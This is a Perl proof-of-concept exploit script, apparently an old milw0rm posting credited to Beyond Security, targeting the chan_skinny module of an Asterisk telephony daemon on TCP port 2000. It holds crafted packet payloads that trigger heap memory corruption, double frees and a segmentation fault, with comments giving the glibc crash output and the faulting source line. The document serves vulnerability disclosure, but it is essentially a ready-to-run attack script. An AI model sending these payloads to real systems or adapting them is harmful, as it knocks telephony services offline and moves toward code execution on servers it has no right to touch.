30 lines
No EOL
1.2 KiB
Perl
Executable file
30 lines
No EOL
1.2 KiB
Perl
Executable file
#!/usr/bin/perl
|
|
# Beyond Security
|
|
# Copyright Noam Rathaus <noamr@beyondsecurity.com>
|
|
|
|
#
|
|
# The following proof of concept causes the chan_skippy to crash in different locations and due to
|
|
# memory corruption as well as double free calls, this is based on the finding of
|
|
# Security-Assessment.com, and proves that the vulnerability is indeed exploitable and there...
|
|
#
|
|
|
|
use IO::Socket;
|
|
use strict;
|
|
|
|
my $target = "127.0.0.1";
|
|
|
|
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $target, PeerPort => "2000");
|
|
|
|
unless ($remote) { die "cannot connect to skinny daemon on $target" }
|
|
|
|
my $packet = "A"x1000; #Causes *** glibc detected *** malloc(): memory corruption: 0x08175830 ***
|
|
my $packet = "\x30\xE0\x00\x00"."\x00\x00\x00\x00".("A"x1000); # *** glibc detected *** double free or corruption (!prev): 0x08184348 ***
|
|
my $packet = "\xE5\x03\x00\x00".("A"x996); # *** glibc detected *** double free or corruption (out): 0x08171740 ***
|
|
my $packet = "\xF0\xFF\xFF\xFF".("A"x996); # Program received signal SIGSEGV, Segmentation fault.
|
|
#[Switching to Thread -1494127696 (LWP 9909)]
|
|
#0xa76264cb in skinny_session (data=0x8183ee8) at chan_skinny.c:2896
|
|
#2896 memcpy(req, s->inbuf, letohl(*(int*)(s->inbuf))+8);
|
|
|
|
print $remote $packet;
|
|
|
|
# milw0rm.com [2006-10-19] |